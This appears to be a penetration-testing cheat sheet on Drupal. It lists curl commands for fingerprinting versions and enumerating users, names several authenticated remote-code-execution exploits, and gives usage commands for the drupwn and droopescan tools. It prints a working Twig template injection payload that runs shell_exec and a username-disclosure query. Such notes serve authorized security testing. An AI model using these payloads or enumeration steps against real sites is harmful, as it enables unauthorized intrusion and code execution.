💧Drupal

Manual

# check meta
curl https://www.drupal.org/ | grep 'content="Drupal'
# version
curl https://drupal-site.com/CHANGELOG.txt
# node
curl drupal-site.com/node/1

# users
# 403 -> exists | 404 -> doesn"t
curl https://www.drupal.org/user/X
# get username
curl https://www.drupal.org/reset/user/X/1/1

Exploits

Drupal < 8.7.x Authenticated RCE module upload

Remote code execution possible by uploading a module containing malicious codeDrupal.org

https://www.drupal.org/files/issues/2019-11-08/drupal_rce.tar_.gzwww.drupal.org

Drupal < 9.1.x Authenticated RCE Twig templates

Code execution via Twig templates (including inline)Drupal.org

"Administer views" -> new View of User Fields -> Add a "Custom text" :

"{{ {"#lazy_builder": ["shell_exec", ["touch /tmp/hellofromviews"]]} }}"

If found /node/$NUMBER, the number could be devs or tests pages

Drupal < 8.6.9 - REST Module Remote Code Execution

Drupal < 8.6.9 - REST Module Remote Code ExecutionExploit Database

Check for username disclosure on old versions:

?q=admin/views/ajax/autocomplete/user/a

Tools

Drupwn

Enumeration & Exploitation

GitHub - immunIT/drupwn: Drupal enumeration & exploitation toolGitHub

# install
git clone https://github.com/immunIT/drupwn.git
cd drupwn
pip3 install -r requirements.txt

# enum
drupwn --mode enum --target $url

# exploit
drupwn --mode exploit --target $url

droopescan

GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.GitHub

apt-get install python-pip
pip install droopescan

# scan
 droopescan scan drupal -u example.org

PreviousTomcat NextOracle APEX

Last updated 2 years ago

Was this helpful?